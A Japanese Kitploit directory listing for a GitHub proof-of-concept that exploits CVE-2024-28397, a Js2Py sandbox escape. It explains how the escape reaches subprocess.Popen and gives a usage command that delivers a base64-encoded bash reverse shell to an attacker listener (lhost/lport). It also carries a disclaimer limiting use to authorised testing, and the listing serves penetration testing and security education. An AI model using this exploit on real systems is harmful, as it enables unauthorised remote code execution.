Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-28397-Js2Py-RCE — このリポジトリには、CVE-2024-28397(js2pyライブラリの脆弱性で、サンドボックスエスケープによるリモートコード実行を可能にするもの)の概念実証(PoC)が含まれています。 | Kitploit
ツール/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

このリポジトリには、CVE-2024-28397(js2pyライブラリの脆弱性で、サンドボックスエスケープによるリモートコード実行を可能にするもの)の概念実証(PoC)が含まれています。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-28397-Js2Py-RCE

説明

このリポジトリには、Python用のJs2Py JavaScriptインタプリタにおけるサンドボックスエスケープの脆弱性であるCVE-2024-28397に対するPythonベースのProof of Concept(PoC)が含まれています。対象のアプリケーションがJs2Py経由で信頼できないJSコードを評価する場合、攻撃者はサンドボックスから脱出し、任意のPythonコードを実行できます。これを利用して、脆弱なシステム上でリモートコード実行(RCE)とリバースシェルを獲得できます。

このエクスプロイトは、Marven11のCVE-2024-28397-js2py-Sandbox-Escapeプロジェクトに触発されました。


免責事項

このスクリプトは、教育および許可されたペネトレーションテスト目的のみで提供されています。所有していない、または明示的なテスト許可がないシステムに対してこのスクリプトを無断で使用することは、違法かつ非倫理的です。作者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。


脆弱性について

  • CVE ID: CVE-2024-28397
  • コンポーネント: Js2Py サンドボックスエスケープ
  • 影響: __class__.__base__.__subclasses__ を介したPythonのオブジェクトモデルへの無制限アクセスにより、任意のコード実行が可能
  • 攻撃ベクトル: リモート(ユーザー制御のJavaScriptを評価するHTTPインターフェースを介して)

機能

  • Python RCEによる自動リバースシェルペイロード配信
  • インラインのBase64エンコードされたシェルコマンド実行
  • 基本的なPTY安定化を備えた内蔵リバースシェルリスナー
  • クリーンな出力フォーマット
  • 軽量で依存関係不要(requestsを除く)

要件

  • Python 3.x
  • requests モジュール (pip install requests)
  • Linuxシステム(/dev/tcp リバースシェル用)
  • 脆弱なJs2Py実装を実行しているターゲット

  • 使用方法

    root@kitploit:~
    python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
    
    • --target: 脆弱なWebアプリケーションエンドポイントの完全なURL
    • --lhost: ローカルIPアドレス(リバースシェルに使用)
    • --lport: シェルを受信するローカルポート

    動作の仕組み

    1. スクリプトはBashリバースシェルを準備し、Base64エンコードして、JavaScriptペイロードに注入します。
    2. JSペイロードは __class__.__base__.__subclasses__() を使用してPythonオブジェクトツリーを探索し、subprocess.Popen を見つけます。
    3. Popen を使用してシェルをデコードして実行します。
    4. 攻撃者のマシンがリバースシェルを受信し、自動的に安定化します。
    ツールをダウンロード